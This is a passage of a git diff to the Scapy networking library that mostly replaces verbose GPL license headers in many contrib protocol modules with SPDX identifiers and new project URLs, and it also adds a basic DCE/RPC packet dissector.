Diagnostic Service (UDS) # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/uds_ecu_states.py b/scapy/contrib/automotive/uds_ecu_states.py index c98fed0c026..9d29b9cbc9d 100644 --- a/scapy/contrib/automotive/uds_ecu_states.py +++ b/scapy/contrib/automotive/uds_ecu_states.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = UDS EcuState modifications # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/uds_logging.py b/scapy/contrib/automotive/uds_logging.py index 062ebc9d24c..cad7827a491 100644 --- a/scapy/contrib/automotive/uds_logging.py +++ b/scapy/contrib/automotive/uds_logging.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = UDS Ecu logging additions # scapy.contrib.status = library diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index ad6ab37c06d..638eb5dbb3c 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = UDS AutomotiveTestCaseExecutor # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/volkswagen/__init__.py b/scapy/contrib/automotive/volkswagen/__init__.py index f06000ab15a..618bfe6c8d2 100644 --- a/scapy/contrib/automotive/volkswagen/__init__.py +++ b/scapy/contrib/automotive/volkswagen/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/volkswagen/definitions.py b/scapy/contrib/automotive/volkswagen/definitions.py index 56c1ab57186..f9b09dacf6b 100644 --- a/scapy/contrib/automotive/volkswagen/definitions.py +++ b/scapy/contrib/automotive/volkswagen/definitions.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Jonas Schmidt -# This program is published under a GPLv2 license # scapy.contrib.description = Volkswagen specific definitions for UDS # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/xcp/__init__.py b/scapy/contrib/automotive/xcp/__init__.py index 1a693bdcf8b..bd954beb1fc 100644 --- a/scapy/contrib/automotive/xcp/__init__.py +++ b/scapy/contrib/automotive/xcp/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Tabea Spahn -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/xcp/cto_commands_master.py b/scapy/contrib/automotive/xcp/cto_commands_master.py index 0d1b49af8af..84433bc9b92 100644 --- a/scapy/contrib/automotive/xcp/cto_commands_master.py +++ b/scapy/contrib/automotive/xcp/cto_commands_master.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Tabea Spahn -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/xcp/cto_commands_slave.py b/scapy/contrib/automotive/xcp/cto_commands_slave.py index 905aaff48f1..c0fabe73ec8 100644 --- a/scapy/contrib/automotive/xcp/cto_commands_slave.py +++ b/scapy/contrib/automotive/xcp/cto_commands_slave.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Tabea Spahn -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/xcp/scanner.py b/scapy/contrib/automotive/xcp/scanner.py index 777951fdb14..c1d57721c75 100644 --- a/scapy/contrib/automotive/xcp/scanner.py +++ b/scapy/contrib/automotive/xcp/scanner.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Tabea Spahn -# This program is published under a GPLv2 license # scapy.contrib.description = XCPScanner # scapy.contrib.status = loads diff --git a/scapy/contrib/automotive/xcp/utils.py b/scapy/contrib/automotive/xcp/utils.py index 24bb63a6717..5d04ba80a02 100644 --- a/scapy/contrib/automotive/xcp/utils.py +++ b/scapy/contrib/automotive/xcp/utils.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Tabea Spahn -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/automotive/xcp/xcp.py b/scapy/contrib/automotive/xcp/xcp.py index 3457424e1b1..dcadac43894 100644 --- a/scapy/contrib/automotive/xcp/xcp.py +++ b/scapy/contrib/automotive/xcp/xcp.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Tabea Spahn -# This program is published under a GPLv2 license # scapy.contrib.description = Universal calibration and measurement protocol (XCP) # noqa: E501 # scapy.contrib.status = loads diff --git a/scapy/contrib/avs.py b/scapy/contrib/avs.py index de3ead56ce6..c7598cf954f 100644 --- a/scapy/contrib/avs.py +++ b/scapy/contrib/avs.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = AVS WLAN Monitor Header # scapy.contrib.status = loads diff --git a/scapy/contrib/bfd.py b/scapy/contrib/bfd.py index 4dc16ecf6d8..06565a03ab9 100644 --- a/scapy/contrib/bfd.py +++ b/scapy/contrib/bfd.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Parag Bhide -# This program is published under GPLv2 license """ BFD - Bidirectional Forwarding Detection - RFC 5880, 5881, 7130, 7881 diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index f693e3852e8..4ba4dc60297 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = BGP v0.1 # scapy.contrib.status = loads diff --git a/scapy/contrib/bier.py b/scapy/contrib/bier.py index 1a0260cede0..b6bf9122190 100644 --- a/scapy/contrib/bier.py +++ b/scapy/contrib/bier.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Bit Index Explicit Replication (BIER) # scapy.contrib.status = loads diff --git a/scapy/contrib/bp.py b/scapy/contrib/bp.py index c69449ec41e..37ed86ac938 100644 --- a/scapy/contrib/bp.py +++ b/scapy/contrib/bp.py @@ -1,26 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2012 The MITRE Corporation """ - Copyright 2012, The MITRE Corporation:: - - NOTICE +.. centered:: + NOTICE This software/technical data was produced for the U.S. Government under Prime Contract No. NASA-03001 and JPL Contract No. 1295026 - and is subject to FAR 52.227-14 (6/87) Rights in Data General, - and Article GP-51, Rights in Data General, respectively. - This software is publicly released under MITRE case #12-3054 + and is subject to FAR 52.227-14 (6/87) Rights in Data General, + and Article GP-51, Rights in Data General, respectively. + This software is publicly released under MITRE case #12-3054 """ # scapy.contrib.description = Bundle Protocol (BP) diff --git a/scapy/contrib/cansocket.py b/scapy/contrib/cansocket.py index 962488ece93..27cb76d6343 100644 --- a/scapy/contrib/cansocket.py +++ b/scapy/contrib/cansocket.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = CANSocket Utils # scapy.contrib.status = loads diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 9c1068a55a5..3cd16f2230b 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = Native CANSocket # scapy.contrib.status = loads diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 7bc56b5b2ec..a7932b8a6a9 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Nils Weiss -# This program is published under a GPLv2 license # scapy.contrib.description = python-can CANSocket # scapy.contrib.status = loads diff --git a/scapy/contrib/carp.py b/scapy/contrib/carp.py index 3aea2f3483f..a1436002439 100644 --- a/scapy/contrib/carp.py +++ b/scapy/contrib/carp.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Common Address Redundancy Protocol (CARP) # scapy.contrib.status = loads diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index 753cde3877c..7998248f5e3 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -1,25 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2006 Nicolas Bareil +# Arnaud Ebalard +# EADS/CRC security team + # scapy.contrib.description = Cisco Discovery Protocol (CDP) # scapy.contrib.status = loads -############################################################################# -# # -# cdp.py --- Cisco Discovery Protocol (CDP) extension for Scapy # -# # -# Copyright (C) 2006 Nicolas Bareil # -# Arnaud Ebalard # -# EADS/CRC security team # -# # -# This file is part of Scapy # -# Scapy is free software: you can redistribute it and/or modify it # -# under the terms of the GNU General Public License version 2 as # -# published by the Free Software Foundation; version 2. # -# # -# This program is distributed in the hope that it will be useful, but # -# WITHOUT ANY WARRANTY; without even the implied warranty of # -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # -# General Public License for more details. # -# # -############################################################################# +""" +Cisco Discovery Protocol (CDP) extension for Scapy +""" from __future__ import absolute_import import struct diff --git a/scapy/contrib/chdlc.py b/scapy/contrib/chdlc.py index e17201203a5..b6946842022 100644 --- a/scapy/contrib/chdlc.py +++ b/scapy/contrib/chdlc.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Cisco HDLC and SLARP # scapy.contrib.status = loads diff --git a/scapy/contrib/coap.py b/scapy/contrib/coap.py index 0bd0145cd4f..a6f710f1b59 100644 --- a/scapy/contrib/coap.py +++ b/scapy/contrib/coap.py @@ -1,19 +1,6 @@ -# This file is part of Scapy. -# See http://www.secdev.org/projects/scapy for more information. -# -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# (at your option) any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . -# +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2016 Anmol Sarma # scapy.contrib.description = Constrained Application Protocol (CoAP) diff --git a/scapy/contrib/concox.py b/scapy/contrib/concox.py index 0fd2e861ce5..c7ca01301f9 100644 --- a/scapy/contrib/concox.py +++ b/scapy/contrib/concox.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2019 Juciano Cardoso # 2019 Guillaume Valadon -## -# This program is published under a GPLv2 license # scapy.contrib.description = Concox CRX1 unit tests # scapy.contrib.status = loads diff --git a/scapy/contrib/dce_rpc.py b/scapy/contrib/dce_rpc.py new file mode 100644 index 00000000000..a96b28364e9 --- /dev/null +++ b/scapy/contrib/dce_rpc.py @@ -0,0 +1,161 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2016 Gauthier Sebaux + +# scapy.contrib.description = DCE/RPC +# scapy.contrib.status = loads + +""" +A basic dissector for DCE/RPC. +Isn't reliable for all packets and for building +""" + +import struct + +from scapy.packet import Packet, Raw, bind_layers +from scapy.fields import ( + BitEnumField, + ByteEnumField, + ByteField, + FlagsField, + IntField, + LenField, + ShortField, + UUIDField, + XByteField, + XShortField, +) + + +# Fields +class EndiannessField(object): + """Field which change the endianness of a sub-field""" + __slots__ = ["fld", "endianess_from"] + + def __init__(self, fld, endianess_from): + self.fld = fld + self.endianess_from = endianess_from + + def set_endianess(self, pkt): + """Add the endianness to the format""" + end = self.endianess_from(pkt) + if isinstance(end, str) and end: + if isinstance(self.fld, UUIDField): + self.fld.uuid_fmt = (UUIDField.FORMAT_LE if end == '<' + else UUIDField.FORMAT_BE) + else: + # fld.fmt should always start with a order specifier, cf field + # init + self.fld.fmt = end[0] + self.fld.fmt[1:] + self.fld.struct = struct.Struct(self.fld.fmt) + + def getfield(self, pkt, buf): + """retrieve the field with endianness""" + self.set_endianess(pkt) + return self.fld.getfield(pkt, buf) + + def addfield(self, pkt, buf, val): + """add the field with endianness to the buffer""" + self.set_endianess(pkt) + return self.fld.addfield(pkt, buf, val) + + def __getattr__(self, attr): + return getattr(self.fld, attr) + + +# DCE/RPC Packet +DCE_RPC_TYPE = ["request", "ping", "response", "fault", "working", "no_call", + "reject", "acknowledge", "connectionless_cancel", "frag_ack", + "cancel_ack"] +DCE_RPC_FLAGS1 = ["reserved_0", "last_frag", "frag", "no_frag_ack", "maybe", + "idempotent", "broadcast", "reserved_7"] +DCE_RPC_FLAGS2 = ["reserved_0", "cancel_pending", "reserved_2", "reserved_3", + "reserved_4", "reserved_5", "reserved_6", "reserved_7"] + + +def dce_rpc_endianess(pkt): + """Determine the right endianness sign for a given DCE/RPC packet""" + if pkt.endianness == 0: # big endian + return ">" + elif pkt.endianness == 1: # little endian + return "<" + else: + return "!" + + +class DceRpc(Packet): + """DCE/RPC packet""" + name = "DCE/RPC" + fields_desc = [ + ByteField("version", 4), + ByteEnumField("type", 0, DCE_RPC_TYPE), + FlagsField("flags1", 0, 8, DCE_RPC_FLAGS1), + FlagsField("flags2", 0, 8, DCE_RPC_FLAGS2), + BitEnumField("endianness", 0, 4, ["big", "little"]), + BitEnumField("encoding", 0, 4, ["ASCII", "EBCDIC"]), + ByteEnumField("float", 0, ["IEEE", "VAX", "CRAY", "IBM"]), + ByteField("DataRepr_reserved", 0), + XByteField("serial_high", 0), + EndiannessField(UUIDField("object_uuid", None), + endianess_from=dce_rpc_endianess), + EndiannessField(UUIDField("interface_uuid", None), + endianess_from=dce_rpc_endianess), + EndiannessField(UUIDField("activity", None), + endianess_from=dce_rpc_endianess), + EndiannessField(IntField("boot_time", 0), + endianess_from=dce_rpc_endianess), + EndiannessField(IntField("interface_version", 1), + endianess_from=dce_rpc_endianess), + EndiannessField(IntField("sequence_num", 0), + endianess_from=dce_rpc_endianess), + EndiannessField(ShortField("opnum", 0), + endianess_from=dce_rpc_endianess), + EndiannessField(XShortField("interface_hint", 0xffff), + endianess_from=dce_rpc_endianess), + EndiannessField(XShortField("activity_hint", 0xffff), + endianess_from=dce_rpc_endianess), + EndiannessField(LenField("frag_len", None, fmt="H"), + endianess_from=dce_rpc_endianess), + EndiannessField(ShortField("frag_num", 0), + endianess_from=dce_rpc_endianess), + ByteEnumField("auth", 0, ["none"]), # TODO other auth ? + XByteField("serial_low", 0), + ] + + +# Heuristically way to find the payload class +# +# To add a possible payload to a DCE/RPC packet, one must first create the +# packet class, then instead of binding layers using bind_layers, he must +# call DceRpcPayload.register_possible_payload() with the payload class as +# parameter. +# +# To be able to decide if the payload class is capable of handling the rest of +# the dissection, the classmethod can_handle() should be implemented in the +# payload class. This method is given the rest of the string to dissect as +# first argument, and the DceRpc packet instance as second argument. Based on +# this information, the method must return True if the class is capable of +# handling the dissection, False otherwise +class DceRpcPayload(Packet): + """Dummy class which use the dispatch_hook to find the payload class""" + _payload_class = [] + + @classmethod + def dispatch_hook(cls, _pkt, _underlayer=None, *args, **kargs): + """dispatch_hook to choose among different registered payloads""" + for klass in cls._payload_class: + if hasattr(klass, "can_handle") and \ + klass.can_handle(_pkt, _underlayer): + return klass + print("DCE/RPC payload class not found or undefined (using Raw)") + return Raw + + @classmethod + def register_possible_payload(cls, pay): + """Method to call from possible DCE/RPC endpoint to register it as + possible payload""" + cls._payload_class.append(pay) + + +bind_layers(DceRpc, DceRpcPayload) diff --git a/scapy/contrib/diameter.py b/scapy/contrib/diameter.py index 88d6fb7f61d..e67c44e7276 100644 --- a/scapy/contrib/diameter.py +++ b/scapy/contrib/diameter.py @@ -1,22 +1,23 @@ -########################################################################## -# -# Diameter protocol implementation for Scapy -# Original Author: patrick battistello -# -# This implements the base Diameter protocol RFC6733 and the additional standards: # noqa: E501 -# RFC7155, RFC4004, RFC4006, RFC4072, RFC4740, RFC5778, RFC5447, RFC6942, RFC5777 # noqa: E501 -# ETS29229 V12.3.0 (2014-09), ETS29272 V13.1.0 (2015-03), ETS29329 V12.5.0 (2014-12), # noqa: E501 -# ETS29212 V13.1.0 (2015-03), ETS32299 V13.0.0 (2015-03), ETS29210 V6.7.0 (2006-12), # noqa: E501 -# ETS29214 V13.1.0 (2015-03), ETS29273 V12.7.0 (2015-03), ETS29173 V12.3.0 (2015-03), # noqa: E501 -# ETS29172 V12.5.0 (2015-03), ETS29215 V13.1.0 (2015-03), ETS29209 V6.8.0 (2011-09), # noqa: E501 -# ETS29061 V13.0.0 (2015-03), ETS29219 V13.0.0 (2014-12) -# -# IMPORTANT note: -# -# - Some Diameter fields (Unsigned64, Float32, ...) have not been tested yet due to lack # noqa: E501 -# of network captures containing AVPs of that types contributions are welcomed. # noqa: E501 -# -########################################################################## +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Acknowledgment: Patrick Battistello + +""" +Diameter protocol implementation for Scapy + +This implements the base Diameter protocol RFC6733 and the additional standards: # noqa: E501 + RFC7155, RFC4004, RFC4006, RFC4072, RFC4740, RFC5778, RFC5447, RFC6942, RFC5777 # noqa: E501 + ETS29229 V12.3.0 (2014-09), ETS29272 V13.1.0 (2015-03), ETS29329 V12.5.0 (2014-12), # noqa: E501 + ETS29212 V13.1.0 (2015-03), ETS32299 V13.0.0 (2015-03), ETS29210 V6.7.0 (2006-12), # noqa: E501 + ETS29214 V13.1.0 (2015-03), ETS29273 V12.7.0 (2015-03), ETS29173 V12.3.0 (2015-03), # noqa: E501 + ETS29172 V12.5.0 (2015-03), ETS29215 V13.1.0 (2015-03), ETS29209 V6.8.0 (2011-09), # noqa: E501 + ETS29061 V13.0.0 (2015-03), ETS29219 V13.0.0 (2014-12) + +IMPORTANT note: + - Some Diameter fields (Unsigned64, Float32, ...) have not been tested yet due to lack # noqa: E501 + of network captures containing AVPs of that types contributions are welcomed. # noqa: E501 +""" # scapy.contrib.description = Diameter # scapy.contrib.status = loads diff --git a/scapy/contrib/dtp.py b/scapy/contrib/dtp.py index 513a9a1d882..dd4364c0e0a 100644 --- a/scapy/contrib/dtp.py +++ b/scapy/contrib/dtp.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Dynamic Trunking Protocol (DTP) # scapy.contrib.status = loads diff --git a/scapy/contrib/eddystone.py b/scapy/contrib/eddystone.py index ef2f80f4977..7cd41b05ec7 100644 --- a/scapy/contrib/eddystone.py +++ b/scapy/contrib/eddystone.py @@ -1,10 +1,7 @@ -# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- -# eddystone.py - protocol handlers for Eddystone beacons -# +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Michael Farrell -# This program is published under a GPLv2 (or later) license # # scapy.contrib.description = Eddystone BLE proximity beacon # scapy.contrib.status = loads diff --git a/scapy/contrib/eigrp.py b/scapy/contrib/eigrp.py index 775c130e20d..0dd188ec09d 100644 --- a/scapy/contrib/eigrp.py +++ b/scapy/contrib/eigrp.py @@ -1,16 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2009 Jochen Bartl # scapy.contrib.description = Enhanced Interior Gateway Routing Protocol (EIGRP) # scapy.contrib.status = loads @@ -20,9 +11,7 @@ ~~~~~~~~~~~~~~~~~~~~~ :version: 2009-08-13 - :copyright: 2009 by Jochen Bartl :e-mail: lobo@c3a.de / jochen.bartl@gmail.com - :license: GPL v2 :TODO @@ -30,10 +19,6 @@ * http://trac.secdev.org/scapy/ticket/90 - Write function for calculating authentication data - :Known bugs: - - - - :Thanks: - TLV code derived from the CDP implementation of scapy. (Thanks to Nicolas Bareil and Arnaud Ebalard) diff --git a/scapy/contrib/enipTCP.py b/scapy/contrib/enipTCP.py index bfd19fa25a7..c17686537a2 100644 --- a/scapy/contrib/enipTCP.py +++ b/scapy/contrib/enipTCP.py @@ -1,26 +1,17 @@ -# coding: utf8 - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2019 Jose Diogo Monteiro # scapy.contrib.description = EtherNet/IP # scapy.contrib.status = loads -# Copyright (C) 2019 Jose Diogo Monteiro -# Based on https://github.com/scy-phy/scapy-cip-enip -# Routines for EtherNet/IP (Industrial Protocol) dissection -# EtherNet/IP Home: www.odva.org +""" +EtherNet/IP (Industrial Protocol) + +Based on https://github.com/scy-phy/scapy-cip-enip +EtherNet/IP Home: www.odva.org +""" import struct from scapy.packet import Packet, bind_layers diff --git a/scapy/contrib/erspan.py b/scapy/contrib/erspan.py index 3f7fb6a2aeb..69c3310cc32 100644 --- a/scapy/contrib/erspan.py +++ b/scapy/contrib/erspan.py @@ -1,6 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# This program is published under GPLv2 license +# See https://scapy.net/ for more information """ ERSPAN - Encapsulated Remote SPAN diff --git a/scapy/contrib/esmc.py b/scapy/contrib/esmc.py index 6490aa41d4d..728095d1146 100644 --- a/scapy/contrib/esmc.py +++ b/scapy/contrib/esmc.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Ethernet Synchronization Message Channel (ESMC) # scapy.contrib.status = loads diff --git a/scapy/contrib/ethercat.py b/scapy/contrib/ethercat.py index eb2f9ec7a3c..6257d64879b 100644 --- a/scapy/contrib/ethercat.py +++ b/scapy/contrib/ethercat.py @@ -1,3 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + # scapy.contrib.description = EtherCat # scapy.contrib.status = loads @@ -6,17 +10,6 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :author: Thomas Tannhaeuser, hecke@naberius.de - :license: GPLv2 - - This module is free software; you can redistribute it and/or - modify it under the terms of the GNU General Public License - as published by the Free Software Foundation; either version 2 - of the License, or (at your option) any later version. - - This module is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. :description: diff --git a/scapy/contrib/etherip.py b/scapy/contrib/etherip.py index 5f4a8161578..9991796c85a 100644 --- a/scapy/contrib/etherip.py +++ b/scapy/contrib/etherip.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of 